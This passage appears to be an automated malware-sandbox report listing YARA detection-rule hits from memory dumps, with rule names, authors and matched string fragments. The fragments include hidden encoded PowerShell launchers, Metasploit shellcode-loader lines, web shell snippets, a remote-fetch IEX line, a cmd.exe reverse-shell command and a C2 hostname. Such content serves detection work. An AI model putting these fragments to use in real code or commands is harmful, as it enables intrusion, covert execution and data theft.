- 0x195ce:$x5: /tr "powershell.exe -ep bypass -windowstyle hidden -file
- 0x1960c:$x6: C:\\Users\\Public\\Documents\\tmp' + -join
- 0x1963c:$x7: $cmdResult = cmd.exe /c $cmdInst | Out-String;
- 0x1966f:$x8: whoami /groups | findstr /c:"S-1-5-32-544"
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | APT_Turla_Agent_BTZ_Gen_1 | Detects Turla Agent.BTZ | Florian Roth | - 0x3a9a:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s
- 0xa82c:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s
- 0x3b00:$s1: release mutex - %u (%u)(%u)
- 0x3b20:$s2: \system32\win.com
- 0xa9af:$s2: \system32\win.com
- 0x3b36:$s3: Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)
- 0x3b6c:$s4: MakeFile Error(%d) copy file to temp file %s
- 0x3b9d:$s5: %s%%s08x.tmp
- 0x3bae:$s6: Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)
- 0x3bf0:$s7: Mutex_Log
- 0x3bfe:$s8: %s\system32\winview.ocx
- 0x3c49:$s10: Error: pos(%d) > CmdSize(%d)
- 0x3c6b:$s11: \win.com
- 0x3c79:$s12: Error(%d) run %s
- 0x3c90:$s13: %02d.%02d.%04d Log begin:
- 0xa991:$s13: %02d.%02d.%04d Log begin:
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Suspicious_BAT_Strings | Detects a string also used in Netwire RAT auxilliary | Florian Roth | - 0x16dc6:$s1: ping 192.0.2.2 -n 1
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Turla_Mal_Script_Jan18_1 | Detects Turla malicious script | Florian Roth | - 0x16fe1:$s1: .charCodeAt(i %
- 0x16ff6:$s2: {WScript.Quit();}
- 0x1700c:$s3: .charAt(i)) << 10) |
- 0x17025:$s4: = WScript.Arguments;var
- 0x17043:$s5: = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | VBS_Obfuscated_Mal_Feb18_1 | Detects malicious obfuscated VBS observed in February 2018 | Florian Roth | - 0x121c2:$x1: A( Array( (1* 2^1 )+
- 0x121db:$x2: .addcode(A( Array(
- 0x121f2:$x3: false:AA.send:Execute(AA.responsetext):end
- 0x12221:$x4: & A( Array( (1* 2^1 )+
- 0x1223d:$s1: .SYSTEMTYPE:NEXT:IF (UCASE(
- 0x1225d:$s2: A = STR:next:end function
- 0x1227b:$s3: &WSCRIPT.SCRIPTFULLNAME&CHR
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | LokiBot_Dropper_ScanCopyPDF_Feb18 | Auto-generated rule - file Scan Copy.pdf.com | Florian Roth | - 0x116b5:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
- 0x118a1:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
- 0x11708:$s2: Unstalled2
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | - 0x1a763:$sa1: -enc
- 0x1a7a0:$sb2: -window hidden
- 0x194b3:$sb3: -WindowStyle Hidden
- 0x195ec:$sb3: -windowstyle hidden
- 0x5bcc:$sc1: -nop
- 0x5bd1:$se1: -ep bypass
- 0x195e1:$se1: -ep bypass
- 0x1a756:$se2: -exec bypass
- 0x1a793:$se2: -exec bypass
- 0x13c36:$se3: -ExecutionPolicy Bypass
- 0x1a756:$se4: -exec bypass
- 0x1a793:$se4: -exec bypass
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Armitage_msfconsole | Detects Armitage component | Florian Roth | - 0x18b30:$s1: \umeterpreter\u >
- 0x18b46:$s3: ^meterpreter >
- 0x18b5a:$s11: \umsf\u>
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Armitage_OSX | Detects Armitage component | Florian Roth | - 0x18c7a:$x1: resources/covertvpn-injector.exe
- 0x18ca0:$s10: resources/browserpivot.x64.dll
- 0x18cc4:$s17: resources/msfrpcd_new.bat
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Silence_malware_2 | Detects malware sample mentioned in the Silence report on Securelist | Florian Roth | - 0x1dc3a:$x1: \ScreenMonitorService\Release\smmsrv.pdb
- 0x1dc67:$x2: \\.\pipe\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}
- 0x1dc9b:$s1: My Sample Service: ServiceMain: SetServiceStatus returned error
- 0x1dcdf:$s2: \mss.exe
- 0x1dcec:$s3: \out.dat
- 0x1dcf9:$s4: \mss.txt
- 0x1dd06:$s5: Default monitor
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0x1d798:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth | - 0x1752c:$s1: stratum+tcp://
- 0x1753f:$s2: "normalHashing": true,
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | MAL_unspecified_Jan18_1 | Detects unspecified malware sample | Florian Roth | - 0x16d71:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
- 0x16dc6:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1
- 0x16dee:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
- 0x16e20:$s4: start /b "" cmd /c del "%%~f0"&exit /b
- 0x16e4b:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
- 0x16e74:$s6: %s\%s.bat
- 0x16e82:$s7: DEL /s "%s" >nul 2>&1
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | Invoke_PSImage | Detects a command to execute PowerShell from String | Florian Roth | - 0x197f2:$: IEX([System.Text.Encoding]::ASCII.GetString(
- 0x19821:$: System.Drawing.Bitmap((a Net.WebClient).OpenRead(
- 0x19855:$: 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9 ...
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | malware_apt15_royaldll | DLL implant, originally rights.dll and runs as a service | David Cannings | - 0xd88f:$: Nwsapagent
- 0xd87a:$: "%s">>"%s"\s.txt
- 0xd83a:$: del c:\windows\temp\r.exe /f /q
|
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | JoeSecurity_Coinhive | Yara detected Coinhive miner | Joe Security | |
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | JoeSecurity_WebMonitor | Yara detected WebMonitor RAT | Joe Security | |
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | JoeSecurity_MiniRAT | Yara detected Mini RAT | Joe Security | |
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | JoeSecurity_ComRAT_XORKey | Yara detected Turla ComRAT XORKey | Joe Security | |
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp | netwire | detect netwire in memory | JPCERT/CC Incident Response Group | - 0x16dc6:$ping: ping 192.0.2.2
- 0x16dee:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
|
0000000A.00000002.536292107.0000000002E75000.00000004.00000040.sdmp | scanarator | Auto-generated rule on file scanarator.exe | yarGen Yara Rule Generator by Florian Roth | - 0x9f78:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|
0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp | Empire_Invoke_Shellcode | Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1 | Florian Roth | - 0x308:$s2: "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
|
0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x48b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
|
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp | webshell_jsp_cmdjsp | Web Shell - file cmdjsp.jsp | Florian Roth | - 0xd88:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp | webshell_sig_404super | Web shells - generated from file 404super.php | Florian Roth | - 0xc08:$s4: $i = pack('c*', 0x70, 0x61, 99, 107);
|
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp | webshell_webshells_new_Asp | Web shells - generated from file Asp.asp | Florian Roth | - 0xdc8:$s1: Execute MorfiCoder(")/*/z/*/(tseuqer lave")
|
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
00000013.00000003.470556930.0000000006B92000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x1db:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
|
0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x179d0:$a: Amplia Security
|
0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x17bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x17d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x6c99e:$s2: Auditcleaner
- 0x48a7e:$s11: elatedmonkey
- 0x48656:$elf4: charm_saver
- 0x48f76:$elf8: ebbshave
- 0x48d96:$elf9: eggbasket
- 0x6aece:$elf12: envoytomato
- 0x6af2e:$elf14: estopmoonlit
- 0x48a47:$elf17: ghost_sparc
- 0x48eae:$elf18: jackpop
- 0x4abae:$elf19: orleans_stride
- 0x4a76e:$elf21: seconddate
- 0x48656:$pe2: charm_saver
- 0x48a53:$pe3: ghost_x86
|
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp | webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x49e90:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
|
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp | webshell_webshells_new_PHP1 | Web shells - generated from file PHP1.php | Florian Roth | - 0x4a430:$s3: @preg_replace("/f/e",$_GET['u'],"fengjiao");
|
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp | h4ntu_shell__powered_by_tsoi_ | Semi-Auto-generated - file h4ntu shell [powered by tsoi | unknown | |
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp | WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x49e90:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf | Metasploit Payloads - file msf.sh | Florian Roth | - 0x3c35e:$s1: export buf=\
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_2 | Metasploit Payloads - file msf.asp | Florian Roth | - 0x3c497:$s1: & "\" & "svchost.exe"
- 0x3fd9:$s2: CreateObject("Wscript.Shell")
- 0x3c4b1:$s2: CreateObject("Wscript.Shell")
- 0x3d727:$s2: CreateObject("Wscript.Shell")
- 0x3df7f:$s2: CreateObject("Wscript.Shell")
- 0x3c4d3:$s3: <% @language="VBScript" %>
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_psh | Metasploit Payloads - file msf-psh.vba | Florian Roth | - 0x3f66:$s1: powershell.exe -nop -w hidden -e
- 0x3c620:$s1: powershell.exe -nop -w hidden -e
- 0x3cb19:$s1: powershell.exe -nop -w hidden -e
- 0x3c645:$s2: Call Shell(
- 0x3c655:$s3: Sub Workbook_Open()
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_exe | Metasploit Payloads - file msf-exe.vba | Florian Roth | - 0x3cdc7:$s1: '* PAYLOAD DATA
- 0x3cddb:$s2: = Shell(
- 0x3cde9:$s3: = Environ("USERPROFILE")
- 0x3ce06:$s4: '**************************************************************
- 0x3ce4a:$s5: ChDir (
- 0x3ce56:$s6: '* MACRO CODE
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_3 | Metasploit Payloads - file msf.psh | Florian Roth | - 0x3cf90:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(
- 0x3cfde:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 }
- 0x3d01b:$s3: .func]::VirtualAlloc(0,
- 0x3d037:$s4: .func+AllocationType]::Reserve -bOr [
- 0x3d061:$s5: New-Object System.CodeDom.Compiler.CompilerParameters
- 0x3d09b:$s6: ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
- 0x3d0ec:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
- 0x3d131:$s8: .func]::CreateThread(0,0,$
- 0x3d150:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF }
- 0x3d187:$s10: = [System.Convert]::FromBase64String("/
- 0x3d1b4:$s11: { $global:result = 3; return }
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_4 | Metasploit Payloads - file msf.aspx | Florian Roth | - 0x3d300:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr)
- 0x3d329:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- 0x3d35a:$s3: [System.Runtime.InteropServices.DllImport("kernel32")]
- 0x3d395:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
- 0x3d3d4:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_exe_2 | Metasploit Payloads - file msf-exe.aspx | Florian Roth | - 0x3d57d:$x1: = new System.Diagnostics.Process();
- 0x3d5a5:$x2: .StartInfo.UseShellExecute = true;
- 0x3d5cc:$x3: , "svchost.exe");
- 0x3d5e2:$s4: = Path.GetTempPath();
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_6 | Metasploit Payloads - file msf.vbs | Florian Roth | - 0x3fd7:$s1: = CreateObject("Wscript.Shell")
- 0x3d725:$s1: = CreateObject("Wscript.Shell")
- 0x3df7d:$s1: = CreateObject("Wscript.Shell")
- 0x3ac56:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d749:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3df4c:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d77a:$s3: .GetSpecialFolder(2)
- 0x3d793:$s4: .Write Chr(CLng("
- 0x3d7a9:$s5: = "4d5a90000300000004000000ffff00
- 0x3d7cf:$s6: For i = 1 to Len(
- 0x3d7e5:$s7: ) Step 2
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_7 | Metasploit Payloads - file msf.vba | Florian Roth | - 0x3c93f:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal
- 0x3c987:$s2: = VirtualAlloc(0, UBound(Tsw), &H1000, &H40)
- 0x3c9b8:$s3: = RtlMoveMemory(
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_8 | Metasploit Payloads - file msf.ps1 | Florian Roth | - 0x3cf90:$s1: [DllImport("kernel32.dll")]
- 0x3d91a:$s1: [DllImport("kernel32.dll")]
- 0x3d93a:$s2: [DllImport("msvcrt.dll")]
- 0x3d958:$s3: -Name "Win32" -namespace Win32Functions -passthru
- 0x3d98e:$s4: ::VirtualAlloc(0,[Math]::Max($
- 0x3d9b1:$s5: .Length,0x1000),0x3000,0x40)
- 0x3d9d2:$s6: public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
- 0x3da46:$s7: ::memset([IntPtr]($
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_cmd | Metasploit Payloads - file msf-cmd.ps1 | Florian Roth | - 0x3cafb:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | - 0x3db9c:$s1: if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
- 0x3dbea:$s2: .concat(".exe");
- 0x3dbff:$s3: [0] = "chmod";
- 0x3dc12:$s4: = Runtime.getRuntime().exec(
- 0x3dc33:$s5: , 16) & 0xff;
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_11 | Metasploit Payloads - file msf.hta | Florian Roth | - 0x3df00:$s1: .ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
- 0x3ac56:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d749:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3df4c:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3df7d:$s3: = CreateObject("Wscript.Shell")
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth | - 0x3e0d0:$s1: kernel32.dll WaitForSingleObject),
- 0x3e0f7:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
- 0x3e16e:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object
- 0x3e1d4:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
- 0x94e:$s5: = [System.Convert]::FromBase64String(
- 0x3d187:$s5: = [System.Convert]::FromBase64String(
- 0x3e217:$s5: = [System.Convert]::FromBase64String(
- 0x3e241:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
- 0x3e27b:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | HKTL_Meterpreter_inMemory | Detects Meterpreter in-memory | netbiosX, Florian Roth | - 0xab63:$s1: WS2_32.dll
- 0x9420:$s2: ReflectiveLoader
- 0x9489:$s2: ReflectiveLoader
- 0x98a1:$s2: ReflectiveLoader
- 0x991d:$s2: ReflectiveLoader
- 0xd8b3:$s2: ReflectiveLoader
- 0xd903:$s2: ReflectiveLoader
- 0xe373:$s2: ReflectiveLoader
- 0xe874:$s2: ReflectiveLoader
- 0xeb82:$s2: ReflectiveLoader
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | CVE_2017_8759_SOAP_Excel | Detects malicious files related to CVE-2017-8759 | Florian Roth | |
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | PowerShell_ISESteroids_Obfuscation | Detects PowerShell ISESteroids obfuscation | Florian Roth | - 0x15898:$x1: /\/===\__
- 0x158a6:$x2: ${__/\/==
- 0x158b4:$x3: Catch { }
- 0x158c2:$x4: \_/=} ${_
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_1 | Detects Reflective DLL Loader | Florian Roth | - 0x93d2:$x1: \Release\reflective_dll.pdb
- 0x93f2:$x2: reflective_dll.x64.dll
- 0x940d:$s3: DLL Injection
- 0x941f:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
- 0x9488:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_2 | Detects Reflective DLL Loader - suspicious - Possible FP could be program crack | Florian Roth | - 0x9853:$x1: \ReflectiveDLLInjection-master\
- 0x9877:$s2: reflective_dll.dll
- 0x9adb:$s2: reflective_dll.dll
- 0x9b1c:$s2: reflective_dll.dll
- 0x988e:$s3: DLL injection
- 0x98a0:$s4: _ReflectiveLoader@4
- 0x991c:$s4: _ReflectiveLoader@4
- 0xeb81:$s4: _ReflectiveLoader@4
- 0x98b8:$s5: Reflective Dll Injection
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_3 | Detects Reflective DLL Loader | Florian Roth | - 0x9a88:$s1: \Release\inject.pdb
- 0x9aa0:$s2: !!! Failed to gather information on system processes!
- 0x9877:$s3: reflective_dll.dll
- 0x9adb:$s3: reflective_dll.dll
- 0x9b1c:$s3: reflective_dll.dll
- 0x9af2:$s4: [-] %s. Error=%d
- 0x9b07:$s5: \Start Menu\Programs\reflective_dll.dll
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | VBScript_Favicon_File | VBScript cloaked as Favicon file used in Leviathan incident | Florian Roth | - 0x3e1:$x1: myxml = '<?xml version=""1.0"" encoding=""UTF-8""?>';myxml = myxml +'<root>
- 0x431:$x2: .Run "taskkill /im mshta.exe
- 0x452:$x3: <script language="VBScript">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 :
- 0x4a5:$s1: .ExpandEnvironmentStrings("%ALLUSERSPROFILE%") &
- 0x4da:$s2: .ExpandEnvironmentStrings("%temp%") &
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Backdoor_Redosdru_Jun17 | Detects malware Redosdru - file systemHome.exe | Florian Roth | - 0x181dc:$x1: %s\%d.gho
- 0x114ac:$x2: %s\nt%s.dll
- 0x181ea:$x2: %s\nt%s.dll
- 0x181fa:$x3: baijinUPdate
- 0x114bc:$s1: RegQueryValueEx(Svchost\netsvcs)
- 0x1820b:$s1: RegQueryValueEx(Svchost\netsvcs)
- 0x18230:$s2: serviceone
- 0x1823f:$s3: \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#f \x1F#
- 0x182aa:$s4: servicetwo
- 0x182b9:$s5: UpdateCrc
- 0x182c7:$s6: \x1F#[ \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#
- 0x18322:$s7: nwsaPAgEnT
- 0x18331:$s8: %-24s %-15s 0x%x(%d)
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth | - 0x1114a:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
- 0x184be:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
- 0x1119a:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
- 0x1850e:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
- 0x18557:$x3: TCPConnectFloodThread.target = %s
- 0x1857d:$s1: \Program Files\Internet Explorer\iexplore.exe
- 0x185af:$s2: %c%c%c%c%c%c.exe
- 0x185c4:$s3: GET %s%s HTTP/1.1
- 0x185da:$s4: CCAttack.target = %s
- 0x11325:$s5: Accept-Language: zh-cn
- 0x185f3:$s5: Accept-Language: zh-cn
- 0x1860e:$s6: jdfwkey
- 0x1861a:$s7: hackqz.f3322.org:8880
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | WScript_Shell_PowerShell_Combo | Detects malware from Middle Eastern campaign reported by Talos | Florian Roth | - 0x2baf:$s1: .CreateObject("WScript.Shell")
- 0x1a4cf:$s1: .CreateObject("WScript.Shell")
- 0x1a673:$s1: .CreateObject("WScript.Shell")
- 0x3d98:$p1: powershell.exe
- 0x3dbf:$p1: powershell.exe
- 0x3f66:$p1: powershell.exe
- 0x3fa3:$p1: powershell.exe
- 0x5747:$p1: powershell.exe
- 0xd118:$p1: powershell.exe
- 0xd273:$p1: powershell.exe
- 0xd2b1:$p1: powershell.exe
- 0x10376:$p1: powershell.exe
- 0x13456:$p1: powershell.exe
- 0x38dd2:$p1: powershell.exe
- 0x3b7dc:$p1: powershell.exe
- 0x3bc38:$p1: powershell.exe
- 0x3c620:$p1: powershell.exe
- 0x3cb19:$p1: powershell.exe
- 0x3df32:$p1: powershell.exe
- 0x950:$p3: [System.Convert]::FromBase64String(
- 0x3d189:$p3: [System.Convert]::FromBase64String(
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | HTA_with_WScript_Shell | Detects WScript Shell in HTA | Florian Roth | - 0x15f6a:$s1: <hta:application windowstate="minimize"/>
- 0x160fb:$s1: <hta:application windowstate="minimize"/>
- 0x15f98:$s2: <script>var b=new ActiveXObject("WScript.Shell");
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | HTA_Embedded | Detects an embedded HTA file | Florian Roth | - 0x15f6a:$s1: <hta:application windowstate="minimize"/>
- 0x160fb:$s1: <hta:application windowstate="minimize"/>
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | StoneDrill | Detects malware from StoneDrill threat report | Florian Roth | - 0x3a987:$s1: Hello dear
- 0x3a996:$s2: WRZRZRAR
- 0x3a9a5:$opa1: 66 89 45 D8 6A 64 FF
- 0x3a9b3:$opa2: 8D 73 01 90 0F BF 51 FE
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | StoneDrill_VBS_1 | Detects malware from StoneDrill threat report | Florian Roth | - 0x3ab38:$x1: wmic /NameSpace:\\root\default Class StdRegProv Call SetStringValue hDefKey = "&H80000001" sSubKeyName = "Software\Micros
- 0x3abb6:$x2: ping 1.0.0.0 -n 1 -w 20000 > nul
- 0x3abdb:$s1: WshShell.CopyFile "%COMMON_APPDATA%\Chrome\
- 0x3ac0b:$s2: WshShell.DeleteFile "%temp%\
- 0x3ac2c:$s3: WScript.Sleep(10 * 1000)
- 0x3ac49:$s4: Set WshShell = CreateObject("Scripting.FileSystemObject") While WshShell.FileExists("
- 0x3aca3:$s5: , "%COMMON_APPDATA%\Chrome\
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | ZxShell_Jul17 | Detects a ZxShell - CN threat group | Florian Roth | - 0x1160e:$x1: zxplug -add
- 0x1161e:$x2: getxxx c:\xyz.dll
- 0x11634:$x3: downfile -d c:\windows\update.exe
- 0x1165a:$x4: -fromurl http://x.x.x/x.dll
- 0x1167a:$x5: ping 127.0.0.1 -n 7&cmd.exe /c net start %s
- 0x116aa:$x6: ZXNC -e cmd.exe x.x.x.x
- 0x116c6:$x7: (bind a cmdshell)
- 0x116dc:$x8: ZXFtpServer 21 20 zx
- 0x116f5:$x9: ZXHttpServer
- 0x11707:$x10: c:\error.htm,.exe|c:\a.exe,.zip|c:\b.zip"
- 0x11736:$x11: c:\windows\clipboardlog.txt
- 0x11757:$x12: AntiSniff -a wireshark.exe
- 0x11777:$x13: c:\windows\keylog.txt
|
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp | EternalRocks_taskhost | Detects EternalRocks Malware - file taskhost.exe | Florian Roth | - 0x19b25:$s1: sTargetIP
- 0x19b33:$s2: SERVER_2008R2_SP0
